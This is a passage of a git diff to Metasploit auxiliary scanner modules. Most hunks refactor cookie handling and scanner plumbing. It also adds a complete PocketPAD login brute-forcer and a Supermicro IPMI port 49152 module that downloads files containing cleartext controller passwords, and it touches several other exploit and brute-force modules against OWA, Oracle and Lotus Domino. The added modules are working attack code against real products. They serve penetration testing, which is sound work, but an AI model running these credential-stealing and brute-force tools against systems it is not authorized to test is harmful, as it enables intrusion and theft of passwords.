@@ -134,8 +134,8 @@ class Metasploit4 < Msf::Auxiliary
       'cookie' => session_cookie
     })
 
-    if res and res.code == 302 and res.headers['Set-Cookie'] =~ /UserID=/
-      parse_auth_cookie(res.headers['Set-Cookie'])
+    if res and res.code == 302 and res.get_cookies.include?('UserID=')
+      parse_auth_cookie(res.get_cookies)
       return true
     else
       return false
diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
index 8afd0bdb73..c3c2036cf0 100644
--- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
+++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptString.new('TARGET_URI', [ false, "Single target URI", nil]),
-        OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request", 
+        OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request",
           File.join(Msf::Config.data_directory, "wordlists", "http_owa_common.txt")]),
       ], self.class)
   end
diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb
index 6a71e8a8ea..0883e3e6e5 100644
--- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb
+++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',
       'Description'    => %q{
-        This module exploits a file downlad vulnerability found in Oracle
+        This module exploits a file download vulnerability found in Oracle
         Demantra 12.2.1 in combination with an authentication bypass. By
         combining these exposures, an unauthenticated user can retreive any file
         on the system by referencing the full file path to any file a vulnerable
diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb
index 8240a0ae11..edf003f3df 100644
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -93,26 +93,7 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('BLANK_PASSWORDS', 'RHOSTS','PASSWORD','USERNAME')
   end
 
-  def cleanup
-    # Restore the original settings
-    datastore['BLANK_PASSWORDS'] = @blank_passwords_setting
-    datastore['USER_AS_PASS']    = @user_as_pass_setting
-  end
-
   def run
-    # Store the original setting
-    @blank_passwords_setting = datastore['BLANK_PASSWORDS']
-
-    # OWA doesn't support blank passwords or usernames!
-    datastore['BLANK_PASSWORDS'] = false
-
-    # If there's a pre-defined username/password, we need to turn off USER_AS_PASS
-    # so that the module won't just try username:username, and then exit.
-    @user_as_pass_setting = datastore['USER_AS_PASS']
-    if not datastore['USERNAME'].nil? and not datastore['PASSWORD'].nil?
-      print_status("Disabling 'USER_AS_PASS' because you've specified an username/password")
-      datastore['USER_AS_PASS'] = false
-    end
 
     vhost = datastore['VHOST'] || datastore['RHOST']
 
@@ -200,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary
       return :abort
     end
 
-    if action.name != "OWA_2013" and not res.headers['set-cookie']
+    if action.name != "OWA_2013" and res.get_cookies.empty?
         print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
         return :abort
     end
@@ -233,8 +214,9 @@ class Metasploit3 < Msf::Auxiliary
       end
     else
        # these two lines are the authentication info
-      sessionid = 'sessionid=' << res.headers['set-cookie'].split('sessionid=')[1].split('; ')[0]
-      cadata = 'cadata=' << res.headers['set-cookie'].split('cadata=')[1].split('; ')[0]
+      cookies = res.get_cookies
+      sessionid = 'sessionid=' << cookies.split('sessionid=')[1].split('; ')[0]
+      cadata = 'cadata=' << cookies.split('cadata=')[1].split('; ')[0]
       headers['Cookie'] = 'PBack=0; ' << sessionid << '; ' << cadata
     end
 
diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb
new file mode 100644
index 0000000000..a1a5b75f56
--- /dev/null
+++ b/modules/auxiliary/scanner/http/pocketpad_login.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+    'Name'           => 'PocketPAD Login Bruteforce Force Utility',
+    'Description'    => %{
+      This module scans for PocketPAD login portal, and
+      performs a login bruteforce attack to identify valid credentials.
+    },
+    'Author'         =>
+      [
+        'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+      ],
+    'License'        => MSF_LICENSE
+    ))
+  end
+
+  def run_host(ip)
+    unless is_app_popad?
+      return
+    end
+
+    print_status("#{peer} - Starting login bruteforce...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  #
+  # What's the point of running this module if the target actually isn't PocketPAD
+  #
+
+  def is_app_popad?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/',
+        'method'    => 'GET'
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return false
+    end
+
+    if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD")
+      vprint_good("#{peer} - Running PocketPAD application ...")
+      return true
+    else
+      vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/cgi-bin/config.cgi',
+        'method'    => 'POST',
+        'authorization' => basic_auth(user,pass),
+        'vars_post'    => {
+          'file' => "configindex.html"
+          }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol"))
+      print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+      report_hash = {
+        :host   => rhost,
+        :port   => rport,
+        :sname  => 'PocketPAD Portal',
+        :user   => user,
+        :pass   => pass,
+        :active => true,
+        :type => 'password'
+      }
+      report_auth_info(report_hash)
+      return :next_user
+    else
+      vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+    end
+  end
+end
diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb
index afbbde818a..03ac6dc9d1 100644
--- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb
+++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb
@@ -96,4 +96,4 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb
index b2384421b6..b7382d44ca 100644
--- a/modules/auxiliary/scanner/http/s40_traversal.rb
+++ b/modules/auxiliary/scanner/http/s40_traversal.rb
@@ -8,6 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(update_info(info,
@@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
-  def run
+  def run_host(ip)
     uri = target_uri.path
     uri << '/' if uri[-1, 1] != '/'
 
     t = "/.." * datastore['DEPTH']
 
-    print_status("Retrieving #{datastore['FILE']}")
+    vprint_status("#{peer} - Retrieving #{datastore['FILE']}")
 
     # No permission to access.log or proc/self/environ, so this is all we do :-/
     uri = normalize_uri(uri, 'index.php')
@@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if not res
-      print_error("Server timed out")
+      vprint_error("#{peer} - Server timed out")
     elsif res and res.body =~ /Error 404 requested page cannot be found/
-      print_error("Either the file doesn't exist, or you don't have the permission to get it")
+      vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
     else
       # We don't save the body by default, because there's also other junk in it.
       # But we still have a SAVE option just in case
-      print_line(res.body)
+      print_good("#{peer} - #{datastore['FILE']} retrieved")
+      vprint_line(res.body)
 
       if datastore['SAVE']
         p = store_loot(
@@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
           res.body,
           ::File.basename(datastore['FILE'])
         )
-        print_status("File saved as: #{p}")
+        print_good("#{peer} - File saved as: #{p}")
       end
     end
   end
diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb
index 3d0f2d455a..f87f6d95c0 100644
--- a/modules/auxiliary/scanner/http/scraper.rb
+++ b/modules/auxiliary/scanner/http/scraper.rb
@@ -60,6 +60,14 @@ class Metasploit3 < Msf::Auxiliary
       result.each do |u|
         print_status("[#{target_host}] #{tpath} [#{u}]")
 
+        report_note(
+          :host    => target_host,
+          :port    => rport,
+          :proto   => 'tcp',
+          :type    => "http.scraper.#{rport}",
+          :data    => u
+        )
+
         report_web_vuln(
           :host	=> target_host,
           :port	=> rport,
diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
index 6c00a86bfc..71de9699d7 100644
--- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
+++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
         'authorization' => basic_auth(user,pass)
       })
 
-      if (res and res.headers['Set-Cookie'])
+      if res and !res.get_cookies.empty?
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         report_hash = {
diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb
index df1365d803..1714e690c9 100644
--- a/modules/auxiliary/scanner/http/sevone_enum.rb
+++ b/modules/auxiliary/scanner/http/sevone_enum.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
       'method'    => 'GET'
     })
 
-    if (res and res.code.to_i == 200 and res.headers['Set-Cookie'].include?('SEVONE'))
+    if (res and res.code.to_i == 200 and res.get_cookies.include?('SEVONE'))
       version_key = /Version: <strong>(.+)<\/strong>/
       version = res.body.scan(version_key).flatten
       print_good("#{rhost}:#{rport} - Application confirmed to be SevOne Network Performance Management System version #{version}")
diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb
new file mode 100644
index 0000000000..2b7659888a
--- /dev/null
+++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Supermicro Onboard IPMI Port 49152 Sensitive File Exposure',
+      'Description' => %q{
+        This module abuses a file exposure vulnerability accessible through the web interface
+        on port 49152 of Supermicro Onboard IPMI controllers.  The vulnerability allows an attacker
+        to obtain detailed device information and download data files containing the clear-text
+        usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs
+        were exposed to the internet with this vulnerability.
+      },
+      'Author'       =>
+        [
+          'Zach Wikholm <kestrel[at]trylinux.us>', # Discovery and analysis
+          'John Matherly <jmath[at]shodan.io>',    # Internet-wide scan
+          'Dan Farmer <zen[at]fish2.com>',         # Additional investigation
+          'hdm'                                    # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'URL', 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/'],
+          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
+        ],
+      'DisclosureDate' => 'Jun 19 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(49152)
+      ], self.class)
+  end
+
+  def is_supermicro?
+    res = send_request_cgi(
+      {
+        "uri"       => "/IPMIdevicedesc.xml",
+        "method"    => "GET"
+      })
+
+    if res && res.code == 200 && res.body.to_s =~ /supermicro/i
+      path = store_loot(
+        'supermicro.ipmi.devicexml',
+        'text/xml',
+        rhost,
+        res.body.to_s,
+        'IPMIdevicedesc.xml'
+      )
+      print_good("#{peer} - Stored the device description XML in #{path}")
+      return true
+    else
+      return false
+    end
+  end
+
+
+  def run_host(ip)
+
+    unless is_supermicro?
+      vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller")
+      return
+    end
+
+    candidates = %W{ /PSBlock /PSStore /PMConfig.dat /wsman/simple_auth.passwd }
+
+    candidates.each do |uri|
+      res = send_request_cgi(
+        {
+          "uri"       => uri,
+          "method"    => "GET"
+        })
+
+      next unless res
+
+      unless res.code == 200 && res.body.length > 0
+        vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}")
+        next
+      end
+
+      path = store_loot(
+        'supermicro.ipmi.passwords',
+        'application/octet-stream',
+        rhost,
+        res.body.to_s,
+        uri.split('/').last
+      )
+      print_good("#{peer} - Password data from #{uri} stored to #{path}")
+    end
+  end
+
+end
diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
index 918a44ed28..af35678d44 100644
--- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
+++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
@@ -9,8 +9,10 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
+
   APP_NAME = "Supermicro web interface"
 
   def initialize(info = {})
@@ -23,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
         a valid, but not necessarily administrator-level account, to access the contents of any file
         on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for
         all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)
-        with firmware version SMT_X9_214.
+        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and
+        /wsman/simple_auth.passwd
       },
       'Author'       =>
         [
@@ -33,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          #[ 'CVE', '' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ],
+          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
         ],
       'DisclosureDate' => 'Nov 06 2013'))
 
@@ -75,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
       }
     })
 
-    if res and res.code == 200 and res.body.to_s =~ /self.location="\.\.\/cgi\/url_redirect\.cgi/ and res.headers["Set-Cookie"].to_s =~ /(SID=[a-z]+)/
+    if res and res.code == 200 and res.body.to_s =~ /self.location="\.\.\/cgi\/url_redirect\.cgi/ and res.get_cookies =~ /(SID=[a-z]+)/
       return $1
     else
       return nil
@@ -107,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-  def run
+  def run_host(ip)
     print_status("#{peer} - Checking if it's a #{APP_NAME}....")
     if is_supermicro?
       print_good("#{peer} - Check successful")
@@ -133,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
 
     file_name = my_basename(datastore['FILEPATH'])
     path = store_loot(
-      'supermicro.ipmi.traversal',
+      'supermicro.ipmi.traversal.psblock',
       'application/octet-stream',
       rhost,
       contents,
diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb
index 02407661c3..1c47c9e90b 100644
--- a/modules/auxiliary/scanner/http/splunk_web_login.rb
+++ b/modules/auxiliary/scanner/http/splunk_web_login.rb
@@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary
     session_id      = ''
     cval            = ''
 
-    if res and res.code == 200 and res.headers['Set-Cookie']
-      res.headers['Set-Cookie'].split(';').each {|c|
+    if res and res.code == 200 and !res.get_cookies.empty?
+      res.get_cookies.split(';').each {|c|
         c.split(',').each {|v|
           if v.split('=')[0] =~ /cval/
             cval = v.split('=')[1]
diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb
index 7a5057147e..d3cd471a5e 100644
--- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb
+++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb
@@ -86,8 +86,8 @@ class Metasploit3 < Msf::Auxiliary
     last_login = ''  #A hidden field in the login page
 
     res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
-    if res and res.headers['Set-Cookie']
-      sid = res.headers['Set-Cookie'].scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+    if res and !res.get_cookies.empty?
+      sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
     end
 
     if res
@@ -147,4 +147,4 @@ class Metasploit3 < Msf::Auxiliary
     download_file(sid, fname)
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb
index ab4d7484f9..e07eaecc52 100644
--- a/modules/auxiliary/scanner/http/tomcat_enum.rb
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
           'data'    => post_data,
         }, 20)
 
-      if res and res.code == 200 and res.headers['Set-Cookie']
+      if res and res.code == 200 and !res.get_cookies.empty?
         vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
       elsif res and res.code == 200 and res.body =~ /invalid username/i
         vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb
index 21610d3ab7..ac4e3e77cb 100644
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'V-CMS Login Utility',
       'Description'    => %q{
-          This module attempts to authenticate to an English-based V-CMS login interface.
-        It should only work against version v1.1 or older, because these versions do not
-        have any default protections against bruteforcing.
+        This module attempts to authenticate to an English-based V-CMS login interface. It
+        should only work against version v1.1 or older, because these versions do not have
+        any default protections against bruteforcing.
       },
       'Author'         => [ 'sinn3r' ],
       'License'        => MSF_LICENSE
@@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
           File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
         OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
           File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
-        OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/'])
+        OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
       ], self.class)
   end
 
@@ -39,11 +40,11 @@ class Metasploit3 < Msf::Auxiliary
   def get_sid
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => @uri.path
+      'uri'    => @uri
     })
 
     # Get the PHP session ID
-    m = res.headers['Set-Cookie'].match(/(PHPSESSID=.+);/)
+    m = res.get_cookies.match(/(PHPSESSID=.+);/)
     id = (m.nil?) ? nil : m[1]
 
     return id
@@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
   def do_login(user, pass)
     begin
       sid = get_sid
+      if sid.nil?
+        vprint_error("#{peer} - Failed to get sid")
+        return :abort
+      end
+
       res = send_request_cgi({
         'uri'    => "#{@uri}process.php",
         'method' => 'POST',
@@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
           'sublogin' => '1'
         }
       })
-
       location = res.headers['Location']
-
       res = send_request_cgi({
         'uri' => location,
         'method' => 'GET',
@@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
         return :skip_user
       when /Invalid password/
         vprint_status("#{peer} - Username found: #{user}")
-      else /\<a href="process\.php\?logout=1"\>/
+      when /\<a href="process\.php\?logout=1"\>/
         print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
         report_auth_info({
           :host        => rhost,
@@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     @uri = normalize_uri(target_uri.path)
-    @uri.path << "/" if @uri.path[-1, 1] != "/"
+    @uri << "/" if @uri[-1, 1] != "/"
 
+    super
+  end
+
+  def run_host(ip)
     each_user_pass { |user, pass|
       vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
       do_login(user, pass)
diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
index 30e78c1a37..ea8f0e7cd5 100644
--- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
+++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'IPMI 2.0 RAKP Cipher Zero Authentication Bypass Scanner',
+      'Name'        => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
       'Description' => %q|
         This module identifies IPMI 2.0 compatible systems that are vulnerable
         to an authentication bypass vulnerability through the use of cipher
diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
index 39c02bac5a..2816691fcd 100644
--- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
@@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary
         return
       end
 
-      if (res and res.code == 302 )
-        if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
+      if res and res.code == 302
+        if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
           cookie = "DomAuthSessId=#{$1}"
-        elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i)
+        elsif res.get_cookies.match(/LtpaToken=(.*);(.*)/i)
           cookie = "LtpaToken=#{$1}"
         else
           print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
index a9a4bcec10..3ddd187895 100644
--- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
@@ -45,8 +45,8 @@ class Metasploit3 < Msf::Auxiliary
         'data'    => post_data,
       }, 20)
 
-      if (res and res.code == 302 )
-        if res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
+      if res and res.code == 302
+        if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
           print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")
           report_auth_info(
             :host   => rhost,
diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
index d37c266056..09e2f978f2 100644
--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
           This module calls the target portmap service and enumerates all
         program entries and their running port numbers.
       },
-      'Author'	       => ['<tebo [at] attackresearch.com>'],
+      'Author'	       => ['<tebo[at]attackresearch.com>'],
       'References'	 =>
         [
           ['URL',	'http://www.ietf.org/rfc/rfc1057.txt'],
diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb
index 07eaecf3bf..4c67510bd9 100644
--- a/modules/auxiliary/scanner/msf/msf_web_login.rb
+++ b/modules/auxiliary/scanner/msf/msf_web_login.rb
@@ -76,9 +76,9 @@ class Metasploit3 < Msf::Auxiliary
 
       token = ''
       uisession = ''
-      if res and res.code == 200 and res.headers['Set-Cookie']
+      if res and res.code == 200 and !res.get_cookies.empty?
         # extract tokens from cookie
-        res.headers['Set-Cookie'].split(';').each {|c|
+        res.get_cookies.split(';').each {|c|
           c.split(',').each {|v|
             if v.split('=')[0] =~ /token/
               token = v.split('=')[1]
diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb
index 1d503cb78e..06d9e50251 100644
--- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb
+++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb
@@ -41,15 +41,22 @@ class Metasploit3 < Msf::Auxiliary
 
       data = sock.get_once
 
-        if ( data and data =~ /\\*.TNSLSNR for (.*)/ )
+        if ( data && data =~ /\\*.TNSLSNR for (.*)/ )
           ora_version = data.match(/\\*.TNSLSNR for (.*)/)[1]
           report_service(
-            :host	=> ip,
-            :port	=> datastore['RPORT'],
-            :name   => "oracle",
-            :info   => ora_version
+            :host => ip,
+            :port => datastore['RPORT'],
+            :name => "oracle",
+            :info => ora_version
           )
           print_good("#{ip}:#{datastore['RPORT']} Oracle - Version: " + ora_version)
+        elsif ( data && data =~ /\(ERR=(\d+)\)/ )
+          case $1.to_i
+          when 1189
+            print_error( "#{ip}:#{datastore['RPORT']} Oracle - Version: Unknown - Error code #{$1} - The listener could not authenticate the user")
+          else
+            print_error( "#{ip}:#{datastore['RPORT']} Oracle - Version: Unknown - Error code #{$1}")
+          end
         else
           print_error( "#{ip}:#{datastore['RPORT']} Oracle - Version: Unknown")
         end
diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
index bee4244a5e..cac758bf01 100644
--- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
+++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
@@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary
           OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),
           Opt::RPORT(8080),
         ], self.class)
-    deregister_options('DBUSER','DBPASS')
   end
 
   def run_host(ip)
@@ -57,9 +56,9 @@ class Metasploit3 < Msf::Auxiliary
 
     fd = CSV.foreach(list) do |brute|
 
-      datastore['DBUSER'] = brute[2].downcase
-      datastore['DBPASS'] = brute[3].downcase
-      user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}"
+      dbuser = brute[2].downcase
+      dbpass = brute[3].downcase
+      user_pass = "#{dbuser}:#{dbpass}"
 
       res = send_request_raw({
         'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',
@@ -72,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
       }, 10)
 
       if( not res )
-        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...")
+        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")
         next
       end
       if (res.code == 200)
@@ -89,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
           :data => sid,
           :update => :unique_data
         )
-        print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}")
+        print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}")
         users.push(user_pass)
       else
-        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...")
+        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")
       end
     end #fd.each
 
diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
index 2cff53d60b..c8ece7ac37 100644
--- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
+++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/proto/http'
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
@@ -30,62 +29,43 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
